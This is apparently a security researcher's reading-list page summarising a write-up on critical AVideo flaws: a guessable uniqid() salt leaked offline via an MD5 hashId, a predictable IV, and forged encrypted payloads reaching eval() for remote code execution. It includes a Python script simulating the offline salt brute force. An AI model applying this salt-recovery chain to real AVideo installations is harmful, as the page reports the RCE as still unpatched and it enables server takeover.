Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

From Zero to Shell: Hunting Critical Vulnerabilities in AVideo - 1848

Valentin Lobstein, posted 2 months ago
  • AVideo is an open-source audio/video platform for building YouTube-style video-sharing sites, written in PHP. The code treats anything inside an encrypted payload as trusted, and one of the fields such a payload could carry was a callback parameter whose value was handed to eval(). So, if you could get the application to decrypt data you control, you had RCE.
  • The encryption is AES-256-CBC under the hood, and the key is a value known as the salt. A change several years ago was meant to fix weak salts, but the legacy generation path was kept around: uniqid(), which returns a hex string built from the current Unix time in seconds and microseconds, i.e. the installation timestamp. That timestamp can be narrowed down by inspecting the creation dates of the default categories created during setup.
  • Still, brute forcing the microsecond part of the salt online is impractical: up to a million candidates per second of uncertainty, each costing a request. So they looked for an offline oracle. Each video exposes a hashId that is an MD5 hash over the salt (the other inputs are public). Since everything except the salt is known, candidate salts can be hashed locally until one matches, which leaks the salt without touching the server.
  • The encrypt_decrypt() function uses the system root path as the IV. This can be figured out either via educated guesses or from the posterPortraitPath leaked by another API. With the key (salt) and the IV known, an attacker can forge a valid encrypted payload containing the eval() callback and get code execution on the machine. Pretty neat!
  • Besides this, they found that file uploads and deletions could be performed without authentication, and that an open redirect resulted from a lack of domain validation. Additionally, there were several IDORs from simple missing ownership checks.
  • The vendor said all issues had been patched. However, the critical RCE issue and everything surrounding it were not. Notably, the salt could still be leaked, and the eval() callback remained.
  • At the end of the article, they have a few good takeaways. First, fallback mechanisms that are still reachable can still be exploited, even if the primary path was fixed. Second, the more information you expose to an attacker, the more likely they are to have all the pieces of the puzzle for exploitation. Finally, always verify patches yourself; they are often incomplete. Great bugs!
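To make the offline salt recovery concrete, here is an added example (mine, not code from the article or from the AVideo project) that simulates the chain above in Python rather than PHP. It reproduces the output format of PHP's uniqid() with no prefix ("%08x%05x" of seconds and microseconds), models the hashId as md5(salt + videoId) (the exact inputs of the real hashId are an assumption here; only "md5 over the salt plus public data" comes from the article), and shows how a leaked install timestamp with one-second resolution shrinks the search from a practically unbounded space to at most a million MD5 computations per candidate second. The victim values are constructed for the demo.

```python
import hashlib


def php_uniqid(sec: int, usec: int) -> str:
    """Reproduce PHP uniqid() with no prefix and no extra entropy.

    PHP formats the current time as "%08x%05x" (seconds, microseconds),
    giving the familiar 13-character hex identifier.
    """
    return f"{sec:08x}{usec:05x}"


def hash_id(salt: str, video_id: str) -> str:
    # ASSUMPTION: the hashId is md5 over the salt concatenated with a public
    # value (here the numeric video id). The real concatenation order and
    # inputs in AVideo are not reproduced here; only the shape matters for
    # the offline search.
    return hashlib.md5((salt + video_id).encode()).hexdigest()


def search_space(window_sec: int) -> int:
    """Number of candidate salts for a leaked timestamp known to +/- window_sec."""
    return (2 * window_sec + 1) * 1_000_000


def recover_salt(target_hash: str, video_id: str,
                 leaked_sec: int, window_sec: int = 0):
    """Offline brute force: walk every microsecond of every candidate second
    around the leaked install time and stop at the first hashId match.
    Returns the recovered salt, or None if nothing in the window matches."""
    for sec in range(leaked_sec - window_sec, leaked_sec + window_sec + 1):
        for usec in range(1_000_000):
            candidate = php_uniqid(sec, usec)
            if hash_id(candidate, video_id) == target_hash:
                return candidate
    return None


# --- constructed victim instance -------------------------------------------
# Pretend the site was installed at this second/microsecond; the salt is
# whatever uniqid() returned at that moment.
INSTALL_SEC = 1_700_000_000
INSTALL_USEC = 123_456
VICTIM_SALT = php_uniqid(INSTALL_SEC, INSTALL_USEC)

# Public data an attacker can observe: a video id and its hashId, plus the
# creation date of a default category (second resolution, so usec is lost).
PUBLIC_VIDEO_ID = "42"
PUBLIC_HASH_ID = hash_id(VICTIM_SALT, PUBLIC_VIDEO_ID)
LEAKED_CATEGORY_CREATED_SEC = INSTALL_SEC


def demo() -> dict:
    """Run the attacker's side and report what was recovered."""
    recovered = recover_salt(PUBLIC_HASH_ID, PUBLIC_VIDEO_ID,
                             LEAKED_CATEGORY_CREATED_SEC, window_sec=0)
    return {
        "salt": recovered,
        "matches_victim": recovered == VICTIM_SALT,
        "candidates_per_second_of_window": search_space(0),
    }


if __name__ == "__main__":
    print(demo())
```

With the install second known exactly the loop finishes in well under a second; widening the window to a few seconds multiplies the work by a million per second but is still trivially offline work, which is the whole reason the hashId oracle matters: the same search against the live server would cost one request per candidate.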